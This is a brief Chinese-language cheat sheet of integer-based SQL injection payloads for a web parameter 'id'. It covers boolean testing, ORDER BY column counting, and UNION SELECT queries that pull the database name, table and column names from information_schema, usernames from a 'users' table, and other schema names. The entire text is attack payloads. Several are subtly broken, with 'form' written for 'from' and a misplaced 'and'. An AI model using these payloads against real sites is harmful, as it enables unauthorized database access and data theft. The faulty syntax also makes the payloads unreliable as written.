整形注入
测试
id=1 and 1=1
查询字段数,小于等于不报错,大于报错
id=1 order by 3
确定字段数后,数据库名
id=1111 union select 1,2,database()
表名
id=1111 union select 1,2,group_concat(table_name) form information_schema.tables where table_schema=database()%23
字段
id=1111 union select 1,2,group_concat(column_name) form information_schema.columns where and table_schema=database() table_name='users'%23
查值
id=1111 union select 1,2,username form users%23
查其他数据库
id=1111 union select 1,2,group_concat(schema_name) form information_schema.schemata%23